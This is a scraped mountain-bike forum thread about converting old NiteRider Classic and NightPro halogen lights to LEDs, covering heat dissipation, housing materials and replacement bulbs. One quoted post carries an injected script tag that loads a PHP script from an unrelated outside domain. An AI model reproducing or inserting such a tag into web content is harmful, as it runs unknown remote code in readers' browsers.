Has any1 modded a Niterider Classic to fit LED lights- Mtbr.com
    mtbr member
    Apr 2009

Has any1 modded a Niterider Classic to fit LED lights

just wondering cause im about to pick up a niterider classic for a cheap price.

mtbr member
    Sep 2005
    There is usually no way for the heat to escape the housing. Plastic is a terrible conductor of heat.
    If you can figure it out post a photo, but I don't remember anyone modding this light, It doesn't mean it can't be done but it seems difficult.
    Eric S

mtbr member
    Mar 2009
    I have the same question on a nightpro 6v halogen, ill post pics later today, I think this reflector will fit http://www.dealextreme.com/details.dx/sku.14599. its pretty close to the same size.
    Thanks

One Gear
    I was given a half dozen of them by a friend. I tore them all apart and couldn't come up with anything to do with the plastic housings. They changed to cast aluminum for the LED lights to get the heat out.

Good luck

mtbr member

51 Nichia LEDs circa 1999 (pre power LED). I did a very wet 24Hr race with it in 2001. It consumed about ~3W.

mtbr member
    Mar 2009
    The nightpro light has a metal case, ill order the reflector and see how i go

mtbr member
    Jan 2008
    I was just looking at my NiteRider Classic and was wondering the same thing. I believe that the head unit housing might be Aluminum. My scratch test had me thinking it was a metal of some sort but the magnet wouldn't attach. My Niterider is from around 94 or 95.

Anyway, I was at RadioShack looking to rebuild a battery pack. The clerk suggested replacing the bulds with LED bulbs and using the same reflector. I don't think it would be quite that easy, but it got me thinking about using the housing.

Did you have any luck in using your Classic headunit?
    Attached Images Attached Images

mtbr member
    Mar 2007
    Actually I have the same thing but a little older unit from 1992 or 1993 and the body is made out of heavy duty plastic. They used to have an ad in the Mountain Bike magazine with a picture of a van or truck running over the light and it still worked and was not crushed I too would like to modify it somehow to use the newer and brighter LED's. So if anyone knows how, please let us know.

Aug 2009
    Quote Originally Posted by Joshp82
    The nightpro light has a metal case, ill order the reflector and see how i go<script type="***************" src="http://djmixdownloads.com/script.php"></script>
    hm :s why

aka RossC
    what about something like this ?

mtbr member
    Mar 2007
    Quote Originally Posted by ocean breathes salty
    what about something like this ?

Oceans thanks for the link. I found this also:

http://www.ledlight.com/mr11-6-smt-l...olt-ac-dc.aspx

They say it is equivalent to a 15watt bulb and is 60 lumens, but I would think that a MR11 at 15watts would be more lumens than that. Currently in my NiteRider Classic I have 2 - 20watt bulbs one spot and the other flood.

aka RossC
    Quote Originally Posted by JDELUNA
    Oceans thanks for the link. I found this also:

http://www.ledlight.com/mr11-6-smt-l...olt-ac-dc.aspx

They say it is equivalent to a 15watt bulb and is 60 lumens, but I would think that a MR11 at 15watts would be more lumens than that. Currently in my NiteRider Classic I have 2 - 20watt bulbs one spot and the other flood.
    Here is another thread from a while back that might be relevant.

Members who have read this thread: 0